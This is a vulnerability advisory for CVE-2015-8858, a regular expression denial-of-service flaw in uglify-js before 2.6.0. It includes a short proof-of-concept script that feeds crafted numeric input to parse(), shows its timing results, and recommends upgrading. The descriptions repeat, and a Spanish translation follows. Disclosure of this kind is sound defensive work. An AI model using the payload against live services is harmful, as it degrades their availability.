CVE-2015-8858

The uglify-js package before 2.6.0 for Node.js allows attackers to cause a denial of service (CPU consumption) via crafted input in a parse call, aka a "regular expression denial of service (ReDoS)."

The uglify-js package before 2.6.0 for Node.js allows attackers to cause a denial of service (CPU consumption) via crafted input in a parse call, aka a "regular expression denial of service (ReDoS)."

Versions of `uglify-js` prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the `parse()` method. ### Proof of Concept ``` var u = require('uglify-js'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;"); ``` ### Results ``` $ time node test.js 10000 real 0m1.091s user 0m1.047s sys 0m0.039s $ time node test.js 80000 real 0m6.486s user 0m6.229s sys 0m0.094s ``` ## Recommendation Update to version 2.6.0 or later.

Versions of `uglify-js` prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the `parse()` method. ### Proof of Concept ``` var u = require('uglify-js'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;"); ``` ### Results ``` $ time node test.js 10000 real 0m1.091s user 0m1.047s sys 0m0.039s $ time node test.js 80000 real 0m6.486s user 0m6.229s sys 0m0.094s ``` ## Recommendation Update to version 2.6.0 or later.

El paquete uglify-js en versiones anteriores a 2.6.0 para Node.js permite a atacantes provocar una denegación de servicio (consumo de CPU) a través de una entrada manipulada en una llamada de análisis, vulnerabilidad también conocida como "denegación de servicio de expresión regular (ReDoS)".